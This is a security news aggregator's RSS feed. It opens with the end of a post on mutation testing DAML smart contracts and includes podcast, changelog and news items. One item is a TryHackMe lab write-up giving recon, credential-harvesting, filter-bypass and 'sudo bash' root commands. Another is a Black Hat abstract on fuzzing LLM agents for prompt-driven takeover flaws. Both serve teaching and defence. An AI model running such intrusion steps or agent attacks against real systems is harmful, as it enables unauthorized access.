<p>Re-run the test suite against this mutant. It still passes, and coverage still reports 100%. The contract claims releasing the buyer’s money requires both parties. The mutant lets the seller release it to themselves without the buyer ever confirming delivery. The tests report green either way. Only a test that tries the <em>forbidden</em> path, the seller acting alone, expecting the ledger to reject it, can tell the two contracts apart. No such test exists, and the mutation score says so. (The other three survivors tell the same story from different angles: the buyer-alone twin of this mutant, and two mutants that weaken the <code>paid == amount</code> check to <code>&lt;=</code> and <code>&gt;=</code>, which survive because the test only ever pays the exact amount.)</p>
<p>Step back, and this is the whole point of the exercise. Your tests are the executable specification of your code. Here the implementation changed, one required approval instead of two, and the specification did not react. That means the expected behavior was underspecified all along: whether both the buyer and the seller have to sign off, or just one of them, was never actually written down anywhere a machine could check. Every controller combination type-checks, and coverage reports 100% for all of them. The only place “both must sign” can exist in checkable form is a test that expects the weakened contract to fail, and writing that test is exactly what the surviving mutant tells you to do.</p>
<h2>Limitations and what comes next</h2>
<p>Mewt is not magic. Two limits are worth knowing before you run your first campaign: not every survivor is a real gap, and a campaign costs time. The roadmap that follows them is where we are taking the work next.</p>
<p>Equivalent mutants exist: some survivors turn out to be semantically identical to the original program, so no test could ever catch them. Few public DAML codebases on GitHub come with a full test suite, so we are glad OpenZeppelin open-sourced its <code>canton-stablecoin</code> reference implementation. Mewt generated hundreds of mutants for it. We ran the highest-priority ones through the existing test suite, and seven of those survived. Three were equivalent mutants or sat behind a guard that no path reaches, and the other four were genuine missing test cases. None of the survivors we reviewed pointed to a bug. Such a clean result is what you want when you run Mewt on your own code, and triaging them took minutes.</p>
<p>One of those equivalent mutants shows what that means concretely. A helper computed accrued debt:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">accrueDebt currentDebt lastAccrual now annualRate =
 if currentDebt == 0.0 || annualRate == 0.0 then currentDebt
 else
 let elapsedYears = ... -- elapsed time as a fraction of a year
 in currentDebt * (1.0 + annualRate * elapsedYears)</code></pre>
 <figcaption><span>Figure 5: The accrueDebt helper. Its first-line guard is a shortcut that returns the same value the calculation already produces.</span></figcaption>
</figure>
<p>Mewt forced the <code>if</code> to always take the <code>else</code> branch. No test failed, and none ever could: when the debt is zero, the formula multiplies by zero and returns zero, and when the rate is zero, it multiplies the debt by one and returns it unchanged. The guard is a shortcut that returns the value the formula already produces, so removing it changes nothing. Mewt suppresses the equivalent mutants it can detect. The rest need a reviewer’s judgment to dismiss.</p>
<p>Campaigns cost time in two places. The machine part: Mewt runs your test suite once per mutant, so the wall-clock cost is roughly the number of mutants times how long one test run takes, plus a rebuild if your project needs one. That is minutes on a small codebase and hours on a large one or a slow suite, so the cadence that works is nightly or weekly rather than per-commit. The human part: someone has to look at the survivors. We are working on that front from several directions at Trail of Bits, including our <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">mutation-testing skill</a> that helps configure campaigns for your project, and <a href="https://blog.trailofbits.com/2026/04/23/trailmark-turns-code-into-graphs/">Trailmark</a> with its <code>genotoxic</code> triage skill. None of these understand DAML yet, but the direction is clear: given the right harness and tools, the time-consuming parts of a campaign can be handed to AI agents. The effort is modest and the payoff is concrete: each genuine survivor is a specific test you can write, and every test you add makes your suite enforce one more guarantee your contracts are supposed to make.</p>
<p>Also on the roadmap: choice-consumption mutations (<code>consuming</code> vs <code>nonconsuming</code>) sit cleanly on top of the controller-mutation scaffolding and target a bug class Mewt does not yet reach.</p>
<h2>Dive in</h2>
<p>Install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and <code>mewt run</code>. The quickstart in the README covers the rest. DAML works out of the box. Everything here ran on Daml 3.4 with <code>dpm</code>, but Mewt just drives whatever test command you configure, so Daml 2 projects using the <code>daml</code> assistant work the same way.</p>
<p>Mutation testing complements the rest of your security stack, the type checkers, linters, and property tests you already run, rather than replacing any of it.</p>
<p>If you’re building on Canton, we help teams with security reviews of DAML applications and with the way the code gets built: working directly with your engineers on the development process itself. <a href="https://www.trailofbits.com/contact/">Contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EP 176: NSL]]></title>
<description><![CDATA[Full Transcript One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constituion. So he set out to change the law. […]]]></description>
<link>https://tsecurity.de/de/3653081/it-security-nachrichten/ep-176-nsl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653081/it-security-nachrichten/ep-176-nsl/</guid>
<pubDate>Wed, 08 Jul 2026 04:23:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Full Transcript One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constituion. So he set out to change the law. […]]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.33.12]]></title>
<description><![CDATA[What's Changed

[Swarming] Decouples linux from android_emulator fuzzing by @IvanBM18 in #5347
Use threads for datastore operations under targets feature flag by @PauloVLB in #5352

Full Changelog: v2.33.11...v2.33.12]]></description>
<link>https://tsecurity.de/de/3652553/it-security-tools/v23312/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652553/it-security-tools/v23312/</guid>
<pubDate>Tue, 07 Jul 2026 20:52:32 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>[Swarming] Decouples linux from android_emulator fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IvanBM18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IvanBM18">@IvanBM18</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4797317126" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5347" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5347/hovercard" href="https://github.com/google/clusterfuzz/pull/5347">#5347</a></li>
<li>Use threads for datastore operations under targets feature flag by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PauloVLB/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PauloVLB">@PauloVLB</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4829254992" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5352" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5352/hovercard" href="https://github.com/google/clusterfuzz/pull/5352">#5352</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google/clusterfuzz/compare/v2.33.11...v2.33.12"><tt>v2.33.11...v2.33.12</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The FBI letter was top secret. Fighting it rewrote online privacy law. ✉ Darknet Diaries Ep. 176 NSL]]></title>
<description><![CDATA[Author: Jack Rhysider - Bewertung: 38x - Views:438 One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he ...]]></description>
<link>https://tsecurity.de/de/3650766/it-security-video/the-fbi-letter-was-top-secret-fighting-it-rewrote-online-privacy-law-darknet-diaries-ep-176-nsl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650766/it-security-video/the-fbi-letter-was-top-secret-fighting-it-rewrote-online-privacy-law-darknet-diaries-ep-176-nsl/</guid>
<pubDate>Tue, 07 Jul 2026 09:34:48 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Jack Rhysider - Bewertung: 38x - Views:438 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/K5vBLzojdDA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he set out to change the law.<br />
<br />
Learn more about Nicks work at [calyxinstitute.org](calyxinstitute.org) and [phreeli.com](phreeli.com).<br />
<br />
Check out Cindy’s book [Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance](https://amzn.to/4gXuK2J).<br />
<br />
### Sources<br />
<br />
* https://www.democracynow.org/2010/8/11/gagged_for_6_years_nick_merrill<br />
* https://globalfreedomofexpression.columbia.edu/cases/u-s-nicholas-merrill-v-loretta-e-lynch-14-cv-9763-vm/<br />
* https://clearinghouse.net/case/12966/<br />
* https://www.theguardian.com/law/2015/dec/06/fbi-national-security-letter-gag-order-nick-merrill<br />
* https://www.aclu.org/documents/national-security-letters<br />
* https://www.eff.org/cases/re-matter-2011-national-security-letter<br />
* Cindy’s Book: Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance<br />
<br />
<br />
### Attribution<br />
<br />
Darknet Diaries is created by [Jack Rhysider](https://twitter.com/jackrhysider).<br />
<br />
Assembled by Tristan Ledger.<br />
<br />
Episode artwork by [odibagas](https://99designs.com/profiles/2589930).<br />
<br />
Mixing by [Proximity Sound](https://proximitysound.com/). <br />
<br />
Theme music created by [Breakmaster Cylinder](https://www.personbproductions.com/). Theme song available for listen and download at [bandcamp](https://breakmastercylinder.bandcamp.com/track/darknet-diaries-theme). Or listen to it [on Spotify](https://open.spotify.com/album/3P5CCxXNuUSQldH0GA5ZUy?si=eirhXEyFQaKNf-vdfmb8Jg).<br />
<br />
Visit https://darknetdiaries.com/episode/##/ for a list of sources, full transcripts, and to listen to all episodes.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[176: NSL]]></title>
<description><![CDATA[One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he set out to change the law.Learn more about Nicks wo...]]></description>
<link>https://tsecurity.de/de/3650717/podcasts/176-nsl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650717/podcasts/176-nsl/</guid>
<pubDate>Tue, 07 Jul 2026 09:04:18 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he set out to change the law.</p><p>Learn more about Nicks work at <a href="https://calyxinstitute.org/"><strong>calyxinstitute.org</strong></a> and <a href="https://www.phreeli.com/"><strong>phreeli.com</strong></a>.</p><p>Check out Cindy’s book <a href="https://amzn.to/4gXuK2J"><strong>Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance</strong></a> (https://amzn.to/4gXuK2J).</p><h3>Sponsors</h3><p>Support for this show comes from <a href="https://www.threatlocker.com/"><strong>ThreatLocker®</strong></a>. ThreatLocker® is a Zero Trust Endpoint Protection Platform that strengthens your infrastructure from the ground up. With ThreatLocker® Allowlisting and Ringfencing™, you gain a more secure approach to blocking exploits of known and unknown vulnerabilities. ThreatLocker® provides Zero Trust control at the kernel level that enables you to allow everything you need and block everything else, including ransomware! Learn more at <a href="https://www.threatlocker.com/"><strong>www.threatlocker.com</strong></a>.</p><p>Support for this episode comes from <a href="https://www.netsuite.com/darknet"><strong>NetSuite</strong></a>. NetSuite gives you visibility and control of your financials, planning, budgeting, and of course - inventory - so you can manage risk, get reliable forecasts, and improve margins. NetSuite helps you identify rising costs, automate your manual business processes, and see where to save money. KNOW your numbers. KNOW your business. And get to KNOW how NetSuite can be the source of truth for your entire company. Visit <a href="https://www.netsuite.com/darknet"><strong>www.netsuite.com/darknet</strong></a> to learn more.</p><p>This show is sponsored by <a href="http://mazehq.com/darknet"><strong>Maze</strong></a>. Maze uses AI agents to triage and remediate cloud vulnerabilities by figuring out what’s actually exploitable, not just what’s theoretically risky. They remove the noise, prioritize vulns that matter, and manage remediation, so your team stops wasting time on meaningless vulns. Visit <a href="http://mazehq.com/darknet"><strong>MazeHQ.com/darknet</strong></a> for more information.</p><p><a href="https://darknetdiaries.com/sponsors/"><strong>View all active sponsors.</strong></a></p><h3>Sources</h3><ul>
<li><a href="https://www.democracynow.org/2010/8/11/gagged_for_6_years_nick_merrill"><strong>https://www.democracynow.org/2010/8/11/gagged_for_6_years_nick_merrill</strong></a></li>
<li><a href="https://globalfreedomofexpression.columbia.edu/cases/u-s-nicholas-merrill-v-loretta-e-lynch-14-cv-9763-vm/"><strong>https://globalfreedomofexpression.columbia.edu/cases/u-s-nicholas-merrill-v-loretta-e-lynch-14-cv-9763-vm/</strong></a></li>
<li><a href="https://clearinghouse.net/case/12966/"><strong>https://clearinghouse.net/case/12966/</strong></a></li>
<li><a href="https://www.theguardian.com/law/2015/dec/06/fbi-national-security-letter-gag-order-nick-merrill"><strong>https://www.theguardian.com/law/2015/dec/06/fbi-national-security-letter-gag-order-nick-merrill</strong></a></li>
<li><a href="https://www.aclu.org/documents/national-security-letters"><strong>https://www.aclu.org/documents/national-security-letters</strong></a></li>
<li><a href="https://www.eff.org/cases/re-matter-2011-national-security-letter"><strong>https://www.eff.org/cases/re-matter-2011-national-security-letter</strong></a></li>
<li>Cindy’s Book: <a href="https://amzn.to/4gXuK2J"><strong>Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance</strong></a>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Binvariants: Register-Level Invaraint-Guided Fuzzing for Binaries]]></title>
<description><![CDATA[submitted by    /u/mttd   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3650305/reverse-engineering/binvariants-register-level-invaraint-guided-fuzzing-for-binaries/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650305/reverse-engineering/binvariants-register-level-invaraint-guided-fuzzing-for-binaries/</guid>
<pubDate>Tue, 07 Jul 2026 04:24:00 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/mttd"> /u/mttd </a> <br> <span><a href="https://github.com/FuturesLab/Binvariants">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1upfcgt/binvariants_registerlevel_invaraintguided_fuzzing/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybercrime, Datenlecks und Zero-Days: die wichtigsten Security-Signale der Woche]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Die aktuelle Security-Rundschau zeigt, wie heterogen die Bedrohungslage bleibt: von Haftstrafen wegen Website-Hijacking bis zu großflächigen Datenlecks in der Telekommunikation. Gleichzeitig rückt KI-gestützte Angriffs- und Testautomatisierung in den Fokus – etwa beim sogen...]]></description>
<link>https://tsecurity.de/de/3644514/it-security-nachrichten/cybercrime-datenlecks-und-zero-days-die-wichtigsten-security-signale-der-woche/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644514/it-security-nachrichten/cybercrime-datenlecks-und-zero-days-die-wichtigsten-security-signale-der-woche/</guid>
<pubDate>Sat, 04 Jul 2026 00:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cybersecurity-weekly-roundup.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cybersecurity-weekly-roundup.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cybersecurity-weekly-roundup-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cybersecurity-weekly-roundup-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cybersecurity-weekly-roundup-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cybersecurity-weekly-roundup-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cybersecurity-weekly-roundup-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Die aktuelle Security-Rundschau zeigt, wie heterogen die Bedrohungslage bleibt: von Haftstrafen wegen Website-Hijacking bis zu großflächigen Datenlecks in der Telekommunikation. Gleichzeitig rückt KI-gestützte Angriffs- und Testautomatisierung in den Fokus – etwa beim sogenannten LLM-Fuzzing für Zero-Days. Auf der Verteidigungsseite liefern Cisco und Synology Patches für mehrere kritische Schwachstellen. Für Unternehmen bedeutet […]</p>
<div><a href="https://www.it-boltwise.de/cybercrime-datenlecks-und-zero-days-die-wichtigsten-security-signale-der-woche.html">... den vollständigen Artikel <strong>»Cybercrime, Datenlecks und Zero-Days: die wichtigsten Security-Signale der Woche«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/cybercrime-datenlecks-und-zero-days-die-wichtigsten-security-signale-der-woche.html">Cybercrime, Datenlecks und Zero-Days: die wichtigsten Security-Signale der Woche</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Automatic Detection of Taint-Style Vulnerabilities in LLM-based Agents]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 1x - Views:45 Large Language Models (LLMs) have revolutionized software development, enabling the creation of AI-powered applications known as LLM-based agents. However, recent studies reveal that LLM-based agents are highly susceptible to taint-style vulnerabilitie...]]></description>
<link>https://tsecurity.de/de/3643929/it-security-video/black-hat-europe-2025-automatic-detection-of-taint-style-vulnerabilities-in-llm-based-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643929/it-security-video/black-hat-europe-2025-automatic-detection-of-taint-style-vulnerabilities-in-llm-based-agents/</guid>
<pubDate>Fri, 03 Jul 2026 18:19:32 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 1x - Views:45 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/WqCArHy0VK8?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Large Language Models (LLMs) have revolutionized software development, enabling the creation of AI-powered applications known as LLM-based agents. However, recent studies reveal that LLM-based agents are highly susceptible to taint-style vulnerabilities, which allow malicious prompts to exploit security-sensitive operations. These vulnerabilities pose severe threats to the security of agents, potentially allowing attackers to take over the entire agent remotely.<br />
<br />
In this paper, we propose a novel directed greybox fuzzing approach, called AgentFuzz, the first fuzzing framework for detecting taint-style vulnerabilities in LLM-based agents. AgentFuzz consists of three key phases. First, AgentFuzz leverages the LLM to generate functionality-specific seed prompts in the form of natural language. Second, AgentFuzz utilizes a multifaceted feedback design to assess seed quality from both semantic and distance levels, prioritizing seeds with higher quality. Finally, AgentFuzz employs functionality and argument mutators to refine seeds and trigger vulnerabilities effectively. In our evaluation against 20 widely-used open-source agent applications, AgentFuzz identified 34 high-risk 0-day vulnerabilities, achieving 33 times higher precision than the state-of-the-art approach. These vulnerabilities encompass serious threats like code injection, impacting 14 open-source agents, with 7 of them having over 10,000 stars on GitHub. To date, 23 CVE IDs have been assigned.<br />
<br />
By: <br />
Fengyu Liu  |  Ph.D Student, Fudan University<br />
Ke Li  |  Security Engineer, ByteDance<br />
Jiaqi Luo  |  Ph.D Student, Fudan University<br />
Jiarun Dai  |  Assistant Professor, Fudan University<br />
Bocheng Xiang  |  PhD students, Fudan University<br />
Tian Chen  |  Master's Student, Fudan University<br />
Yilin Wang  |  Master's Student, The University of Manchester<br />
Youkun Shi  |  Postdoctoral Fellow, Hong Kong Polytechnic University<br />
Xing Li  |  Senior Security Engineer, Huawei Technologies Co., Ltd.<br />
Yuan Zhang  |  Professor, Fudan University<br />
Min Yang  |  Professor, Fudan University<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#make-agent-defeat-agent-automatic-detection-of-taint-style-vulnerabilities-in-llm-based-agents-48117<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Pickle Rick: Rick Left the Door Open. I Just Walked In.]]></title>
<description><![CDATA[The password was in robots.txt. The sudo was unrestricted. The box didn’t fight back, and that’s exactly the point.I wasn’t expecting much from a Rick and Morty themed room.Then I found the password in robots.txt and realized, this box isn't about difficulty. It's about attention. Every single cr...]]></description>
<link>https://tsecurity.de/de/3643707/hacking/tryhackme-pickle-rick-rick-left-the-door-open-i-just-walked-in/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643707/hacking/tryhackme-pickle-rick-rick-left-the-door-open-i-just-walked-in/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:04 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>The password was in robots.txt. The sudo was unrestricted. The box didn’t fight back, and that’s exactly the point.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/294/1*y66Xl6BRj3p9wp294BMnKA.jpeg"></figure><p>I wasn’t expecting much from a Rick and Morty themed room.</p><p>Then I found the password in robots.txt and realized, this box isn't about difficulty. It's about attention. Every single credential, every single path to root, was sitting in plain sight. The machine wasn't hiding anything. It was waiting to see if I'd actually look.</p><p>Turns out, most people don’t.</p><h3>Reconnaissance</h3><pre>nmap -sV -sC -T4 10.0.0.4</pre><pre>80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))</pre><p>One port. One door. The entire box lives here.</p><h3>The Web App — Index.php and a Dead End</h3><p>Navigating to http://10.0.0.4 lands on index.php, a Rick and Morty themed page. No login form, nothing interactive. Just flavor text.</p><p>Before moving anywhere, the first instinct: read the source code.</p><pre>&lt;!-- Note to self, remember username! Username: R1ckRul3s --&gt;</pre><p>A username. Hardcoded. In an HTML comment. On the landing page.</p><p>Half the credential is already gone. Now for the password, and the actual entry point.</p><p>robots.txt:</p><pre>Wubbalubbadubdub</pre><p>Not a crawl directive. A password. Rick stored his password in robots.txt.</p><p>But we still have nowhere to use these credentials. Time to fuzz:</p><pre>gobuster dir -u http://10.0.0.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php</pre><p>/portal.php comes back. That's the login form. Navigate there, enter the credentials:</p><p><strong>R1ckRul3s : Wubbalubbadubdub</strong></p><p>Both leaked before we even thought to look for them. The fuzzing was just finding the door.</p><h3>The Command Panel — A Web Shell With Training Wheels</h3><p>Login succeeds and drops straight into a command execution panel. The web app is essentially handing us a terminal. Let’s see what’s here:</p><pre>ls</pre><pre>Sup3rS3cretPickl3Ingred.txt<br>assets<br>clue.txt<br>denied.php<br>index.html<br>login.php<br>portal.php<br>robots.txt</pre><p>Sup3rS3cretPickl3Ingred.txt. That name is not subtle. First ingredient is right there, except the panel blocks cat. Someone tried to add a restriction.</p><p>Linux doesn’t care:</p><pre>less Sup3rS3cretPickl3Ingred.txt</pre><p>First ingredient. The filter was decorative.</p><h3>Going Deeper — The Home Directory</h3><pre>ls /home/rick</pre><pre>second ingredients</pre><pre>less /home/rick/second\ ingredients</pre><p>Second ingredient. Two down, one to go. And for that one, we need root.</p><h3>Privilege Escalation — The Box Barely Tried</h3><pre>sudo -l</pre><pre>User www-data may run the following commands:<br>    (ALL) NOPASSWD: ALL</pre><p>I had to read that twice.</p><p>www-data — the web server user, the account that's supposed to have the least privilege on the entire system can run <em>everything</em> as root with no password.</p><p>This isn’t a misconfiguration. It’s an open gate.</p><pre>sudo bash</pre><pre>whoami<br>root</pre><pre>sudo less /root/3rd.txt</pre><p>Third ingredient. Box done.</p><p>Three credentials in plain sight. One unrestricted sudo. Zero resistance.</p><p><em>Pickle Rick is a room on TryHackMe. This writeup is for educational purposes only. All testing performed on dedicated lab infrastructure with explicit authorization.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e1a8f1f217fa" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-pickle-rick-rick-left-the-door-open-i-just-walked-in-e1a8f1f217fa">TryHackMe — Pickle Rick: Rick Left the Door Open. I Just Walked In.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI 에이전트 시대를 이끄는 CIO의 조건…디지털 리더십 전략 7선]]></title>
<description><![CDATA[AI 에이전트와 인간의 역량을 효과적으로 결합하는 것이 선도적인 CIO의 중요한 과제로 떠오르고 있다. 그렇다면 디지털 리더는 AI 에이전트의 능력과 전문가의 역량 사이에서 어떻게 균형을 이루고, 조직을 에이전트형 AI 시대에 성공적으로 이끌 수 있을까. 다음은 전문가들이 제시하는 7가지 모범 사례다.



1. AI에 대한 두려움을 극복하라



온라인 여행 플랫폼 부킹닷컴(Booking.com)의 데이터 및 머신러닝 플랫폼 총괄 후이 다오(Huy Dao)는 자사의 데이터 스택 덕분에 AI 기반 신규 서비스를 보다 쉽게 개발...]]></description>
<link>https://tsecurity.de/de/3642801/it-nachrichten/ai-cio-7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642801/it-nachrichten/ai-cio-7/</guid>
<pubDate>Fri, 03 Jul 2026 08:02:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI 에이전트와 인간의 역량을 효과적으로 결합하는 것이 선도적인 CIO의 중요한 <a href="https://www.cio.com/article/4172555/how-it-teams-are-putting-ai-agents-to-work.html" target="_blank">과제</a>로 떠오르고 있다. 그렇다면 디지털 리더는 AI 에이전트의 능력과 전문가의 역량 사이에서 어떻게 균형을 이루고, 조직을 에이전트형 AI 시대에 성공적으로 이끌 수 있을까. 다음은 전문가들이 제시하는 7가지 모범 사례다.</p>



<h2 class="wp-block-heading">1. AI에 대한 두려움을 극복하라</h2>



<p>온라인 여행 플랫폼 부킹닷컴(Booking.com)의 데이터 및 머신러닝 플랫폼 총괄 후이 다오(Huy Dao)는 자사의 데이터 스택 덕분에 AI 기반 신규 서비스를 보다 쉽게 개발할 수 있게 됐다고 설명했다. 여기에는 고객과 호텔 간 커뮤니케이션을 자동화하는 파트너-투-게스트 에이전트 시스템도 포함된다.</p>



<p>부킹닷컴의 기술 스택은 아마존웹서비스(AWS) 클라우드, 스노우플레이크(Snowflake) 데이터 플랫폼, 쏘트스팟(ThoughtSpot) 분석 솔루션, 애스트로노머(Astronomer) 오케스트레이션 플랫폼으로 구성된다. 다오의 데이터팀은 이와 함께 앤트로픽이 개발한 MCP(Model Context Protocol), 오픈소스 에이전트 프레임워크 랭그래프(LangGraph), 그리고 다양한 LLM을 유연하게 활용하는 방식도 채택하고 있다.</p>



<p>AI 활용을 위한 견고한 데이터 플랫폼을 구축한 다오는 다른 디지털 리더들도 적극적으로 AI 도입에 나설 것을 권했다. 그는 “기업은 AI 에이전트가 활용할 수 있도록 데이터를 어떻게 준비하고 관리할지 고민해야 한다”라며 “아직 조직이 AI에 회의적이라면 이제는 그런 두려움을 극복해야 한다. AI가 가져올 가능성은 분명히 현실이기 때문이다”라고 설명했다.</p>



<h2 class="wp-block-heading">2. 인간의 역량을 증폭하는 데 집중하라</h2>



<p>채용 전문 기업 하비 내시(Harvey Nash)의 CIO 안쿠르 아난드(Ankur Anand)는 뛰어난 디지털 리더는 AI 에이전트를 인간의 전문성을 확장하는 새로운 인지 인프라 계층으로 바라봐야 한다고 말했다.</p>



<p>그는 아닐 세스(Anil Seth)와 같은 연구자의 이론을 인용하며 지능은 예측, 해석, 맥락 이해를 기반으로 작동한다고 설명했다. AI 에이전트는 예측과 해석에서는 뛰어난 성능을 보이지만, 의미를 부여하는 단계에서는 여전히 인간의 판단에 의존한다. 따라서 디지털 리더는 사람은 방향을 설정하고 AI 에이전트는 규모, 속도, 정확성을 바탕으로 실행을 담당하는 운영 모델을 설계해야 한다고 강조했다.</p>



<p>아난드는 “CIO는 명확한 목표를 제시하고, 거버넌스를 통해 신뢰를 구축하며, 사람과 AI 에이전트가 함께 협업하는 하이브리드 업무 환경을 중심으로 업무 방식을 재설계함으로써 조직을 에이전트형 AI 시대로 이끌 수 있다”라고 말했다.</p>



<p>이어 “AI 에이전트가 투명하고 안전하게 작동할 수 있도록 의사결정 권한, 승인된 데이터 소스, 운영 가이드라인을 명확히 정의해야 한다”라며 “동시에 최종적인 책임과 감독 권한은 사람이 유지해야 한다”라고 설명했다.</p>



<h2 class="wp-block-heading">3. 직원들이 AI를 통해 역량을 발휘할 수 있도록 하라</h2>



<p>IT 시장조사업체 IDC의 리서치 디렉터 에바 즈보로프스카(Ewa Zborowska)는 AI 에이전트가 이메일 답변을 정리하는 것처럼 개별 업무를 자동화하는 데 매우 효과적이며, 이를 통해 직원들이 보다 창의적인 업무에 집중할 수 있다고 설명했다. 그러나 여러 에이전트를 연계해 복잡한 다단계 업무를 수행하도록 만드는 일은 훨씬 더 어려운 과제라고 말했다.</p>



